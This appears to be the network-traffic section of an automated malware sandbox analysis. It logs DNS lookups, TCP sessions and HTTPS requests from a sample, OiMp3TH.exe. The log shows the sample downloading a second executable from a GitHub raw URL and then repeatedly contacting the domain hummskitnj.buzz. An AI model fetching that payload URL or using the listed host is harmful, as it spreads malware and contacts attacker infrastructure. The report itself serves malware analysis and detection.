                                                                                                        Dec 27, 2024 13:11:05.235771894 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:05.235843897 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:05.235852003 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:05.235893965 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:05.242717028 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:05.242733002 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:05.242793083 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:05.242799997 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:05.242835999 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:05.250009060 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:05.250025034 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:05.250112057 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:05.250118017 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:05.250158072 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:05.299002886 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:05.299025059 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:05.299127102 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:05.299146891 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:05.299190044 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:05.401247025 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:05.401284933 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:05.401449919 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:05.401449919 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:05.401458979 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:05.401504040 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:05.404361963 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:05.404423952 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:05.404428005 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:05.404443979 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:05.404467106 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:05.404500008 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:05.405004978 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:05.999505043 CET49706443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:05.999546051 CET44349706172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:05.999622107 CET49706443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:06.000825882 CET49706443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:06.000839949 CET44349706172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:07.221599102 CET44349706172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:07.221826077 CET49706443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:07.230232000 CET49706443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:07.230247974 CET44349706172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:07.230638981 CET44349706172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:07.279619932 CET49706443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:07.452609062 CET49706443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:07.452660084 CET49706443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:07.452806950 CET44349706172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:08.213586092 CET44349706172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:08.213704109 CET44349706172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:08.213784933 CET49706443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:08.216336012 CET49706443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:08.216361046 CET44349706172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:08.216376066 CET49706443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:08.216382980 CET44349706172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:08.223968029 CET49707443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:08.224009991 CET44349707172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:08.224102020 CET49707443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:08.224348068 CET49707443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:08.224359989 CET44349707172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:09.447743893 CET44349707172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:09.447823048 CET49707443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:09.449084044 CET49707443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:09.449094057 CET44349707172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:09.449470043 CET44349707172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:09.450628996 CET49707443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:09.450655937 CET49707443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:09.450712919 CET44349707172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:10.224666119 CET44349707172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:10.224720955 CET44349707172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:10.224756956 CET44349707172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:10.224780083 CET49707443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:10.224790096 CET44349707172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:10.224803925 CET44349707172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:10.224848032 CET49707443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:10.224862099 CET44349707172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:10.224903107 CET49707443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:10.224906921 CET44349707172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:10.224917889 CET44349707172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:10.224952936 CET49707443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:10.232979059 CET44349707172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:10.241451979 CET44349707172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:10.241502047 CET49707443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:10.241508007 CET44349707172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:10.283322096 CET49707443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:10.283327103 CET44349707172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:10.326467991 CET49707443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:10.343986988 CET44349707172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:10.388962984 CET49707443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:10.416551113 CET44349707172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:10.420324087 CET44349707172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:10.420360088 CET44349707172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:10.420367002 CET49707443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:10.420372963 CET44349707172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:10.420418978 CET49707443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:10.420423985 CET44349707172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:10.420475006 CET44349707172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:10.420540094 CET49707443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:10.420799971 CET49707443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:10.420809031 CET44349707172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:10.420834064 CET49707443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:10.420839071 CET44349707172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:10.802748919 CET49708443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:10.802762032 CET44349708172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:10.802841902 CET49708443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:10.803117990 CET49708443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:10.803126097 CET44349708172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:12.014158010 CET44349708172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:12.014250994 CET49708443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:12.016172886 CET49708443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:12.016185999 CET44349708172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:12.016525030 CET44349708172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:12.017767906 CET49708443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:12.017987013 CET49708443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:12.018023014 CET44349708172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:12.872148991 CET44349708172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:12.872251034 CET44349708172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:12.872355938 CET49708443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:13.073276997 CET49708443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:13.073297977 CET44349708172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:13.779062986 CET49713443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:13.779083967 CET44349713172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:13.779155970 CET49713443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:13.779814959 CET49713443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:13.779827118 CET44349713172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:15.037564039 CET44349713172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:15.042052031 CET49713443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:15.042052031 CET49713443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:15.042064905 CET44349713172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:15.042260885 CET44349713172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:15.048849106 CET49713443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:15.049573898 CET49713443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:15.049602032 CET44349713172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:15.049712896 CET49713443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:15.095335007 CET44349713172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:15.889617920 CET44349713172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:15.889702082 CET44349713172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:15.889767885 CET49713443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:15.889944077 CET49713443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:15.889962912 CET44349713172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:16.084620953 CET49715443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:16.084662914 CET44349715172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:16.084742069 CET49715443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:16.085130930 CET49715443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:16.085144997 CET44349715172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:17.342175007 CET44349715172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:17.342319965 CET49715443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:17.343888998 CET49715443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:17.343900919 CET44349715172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:17.344135046 CET44349715172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:17.345314980 CET49715443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:17.345458031 CET49715443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:17.345489025 CET44349715172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:17.345552921 CET49715443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:17.345566988 CET44349715172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:18.331973076 CET44349715172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:18.332061052 CET44349715172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:18.332297087 CET49715443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:18.332472086 CET49715443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:18.332485914 CET44349715172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:18.761581898 CET49725443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:18.761650085 CET44349725172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:18.761753082 CET49725443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:18.762173891 CET49725443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:18.762202024 CET44349725172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:19.972466946 CET44349725172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:19.972668886 CET49725443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:19.973933935 CET49725443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:19.973988056 CET44349725172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:19.974245071 CET44349725172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:19.981911898 CET49725443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:19.982007027 CET49725443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:19.982018948 CET44349725172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:20.738729000 CET44349725172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:20.738811970 CET44349725172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:20.738884926 CET49725443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:20.739056110 CET49725443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:20.739100933 CET44349725172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:21.157310009 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:21.157351971 CET44349733172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:21.157422066 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:21.157764912 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:21.157778025 CET44349733172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:22.467117071 CET44349733172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:22.467303038 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:22.468312979 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:22.468322039 CET44349733172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:22.468550920 CET44349733172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:22.469634056 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:22.470299959 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:22.470331907 CET44349733172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:22.470422029 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:22.470453978 CET44349733172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:22.470551968 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:22.470582008 CET44349733172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:22.470895052 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:22.470922947 CET44349733172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:22.471204996 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:22.471232891 CET44349733172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:22.471375942 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:22.471402884 CET44349733172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:22.471410990 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:22.471560955 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:22.471590042 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:22.519335032 CET44349733172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:22.519507885 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:22.519551039 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:22.519565105 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:22.567320108 CET44349733172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:22.567503929 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:22.567549944 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:22.567585945 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:22.615319967 CET44349733172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:22.615453005 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:22.663335085 CET44349733172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:22.830867052 CET44349733172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:25.741441011 CET44349733172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:25.741544962 CET44349733172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:25.741610050 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:25.745089054 CET49733443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:25.745111942 CET44349733172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:25.772902966 CET49744443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:25.772933960 CET44349744172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:25.773106098 CET49744443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:25.773317099 CET49744443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:25.773329973 CET44349744172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:27.031424999 CET44349744172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:27.031636953 CET49744443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:27.032902002 CET49744443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:27.032912016 CET44349744172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:27.033147097 CET44349744172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:27.034471035 CET49744443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:27.034492970 CET49744443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:27.034540892 CET44349744172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:28.083266020 CET44349744172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:28.083359957 CET44349744172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:28.083419085 CET49744443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:28.083611012 CET49744443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:28.083625078 CET44349744172.67.216.236192.168.2.5
                                                                                                        Dec 27, 2024 13:11:28.083638906 CET49744443192.168.2.5172.67.216.236
                                                                                                        Dec 27, 2024 13:11:28.083643913 CET44349744172.67.216.236192.168.2.5

                                                                                                        UDP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Dec 27, 2024 13:10:58.300035000 CET5346153192.168.2.51.1.1.1
                                                                                                        Dec 27, 2024 13:10:58.436963081 CET53534611.1.1.1192.168.2.5
                                                                                                        Dec 27, 2024 13:11:01.256370068 CET6055953192.168.2.51.1.1.1
                                                                                                        Dec 27, 2024 13:11:01.393217087 CET53605591.1.1.1192.168.2.5
                                                                                                        Dec 27, 2024 13:11:05.693064928 CET4973653192.168.2.51.1.1.1
                                                                                                        Dec 27, 2024 13:11:05.993191957 CET53497361.1.1.1192.168.2.5

                                                                                                        DNS Queries

                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                        Dec 27, 2024 13:10:58.300035000 CET192.168.2.51.1.1.10xf002Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                        Dec 27, 2024 13:11:01.256370068 CET192.168.2.51.1.1.10x6ee9Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                        Dec 27, 2024 13:11:05.693064928 CET192.168.2.51.1.1.10x5e6dStandard query (0)hummskitnj.buzzA (IP address)IN (0x0001)false

                                                                                                        DNS Answers

                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                        Dec 27, 2024 13:10:58.436963081 CET1.1.1.1192.168.2.50xf002No error (0)github.com20.233.83.145A (IP address)IN (0x0001)false
                                                                                                        Dec 27, 2024 13:11:01.393217087 CET1.1.1.1192.168.2.50x6ee9No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                        Dec 27, 2024 13:11:01.393217087 CET1.1.1.1192.168.2.50x6ee9No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                        Dec 27, 2024 13:11:01.393217087 CET1.1.1.1192.168.2.50x6ee9No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                        Dec 27, 2024 13:11:01.393217087 CET1.1.1.1192.168.2.50x6ee9No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                        Dec 27, 2024 13:11:05.993191957 CET1.1.1.1192.168.2.50x5e6dNo error (0)hummskitnj.buzz172.67.216.236A (IP address)IN (0x0001)false
                                                                                                        Dec 27, 2024 13:11:05.993191957 CET1.1.1.1192.168.2.50x5e6dNo error (0)hummskitnj.buzz104.21.86.82A (IP address)IN (0x0001)false

                                                                                                        HTTP Request Dependency Graph

                                                                                                        • github.com
                                                                                                        • raw.githubusercontent.com
                                                                                                        • hummskitnj.buzz

                                                                                                        HTTPS Proxied Packets

                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.2.54970420.233.83.1454434744C:\Users\user\Desktop\OiMp3TH.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-27 12:11:00 UTC115OUTGET /arizaseeen/ariiiza/raw/refs/heads/main/tpuyikkdktyh.exe HTTP/1.1
                                                                                                        Host: github.com
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-12-27 12:11:01 UTC566INHTTP/1.1 302 Found
                                                                                                        Server: GitHub.com
                                                                                                        Date: Fri, 27 Dec 2024 12:11:00 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                        Access-Control-Allow-Origin:
                                                                                                        Location: https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/tpuyikkdktyh.exe
                                                                                                        Cache-Control: no-cache
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                        X-Frame-Options: deny
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 0
                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                        2024-12-27 12:11:01 UTC3380INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        1192.168.2.549705185.199.108.1334434744C:\Users\user\Desktop\OiMp3TH.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-27 12:11:02 UTC126OUTGET /arizaseeen/ariiiza/refs/heads/main/tpuyikkdktyh.exe HTTP/1.1
                                                                                                        Host: raw.githubusercontent.com
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-12-27 12:11:03 UTC904INHTTP/1.1 200 OK
                                                                                                        Connection: close
                                                                                                        Content-Length: 1282560
                                                                                                        Cache-Control: max-age=300
                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                        Content-Type: application/octet-stream
                                                                                                        ETag: "45d4ed74921880f3144c9c2424c6d6cf3800d17328f5f3454666b5242bde0db8"
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-Frame-Options: deny
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        X-GitHub-Request-Id: 9767:18BB3B:15C7452:187ABB9:676E9944
                                                                                                        Accept-Ranges: bytes
                                                                                                        Date: Fri, 27 Dec 2024 12:11:02 GMT
                                                                                                        Via: 1.1 varnish
                                                                                                        X-Served-By: cache-nyc-kteb1890081-NYC
                                                                                                        X-Cache: MISS
                                                                                                        X-Cache-Hits: 0
                                                                                                        X-Timer: S1735301463.885737,VS0,VE52
                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                        X-Fastly-Request-ID: c8e241bc11570946abad278fcae3532d02464524
                                                                                                        Expires: Fri, 27 Dec 2024 12:16:02 GMT
                                                                                                        Source-Age: 0
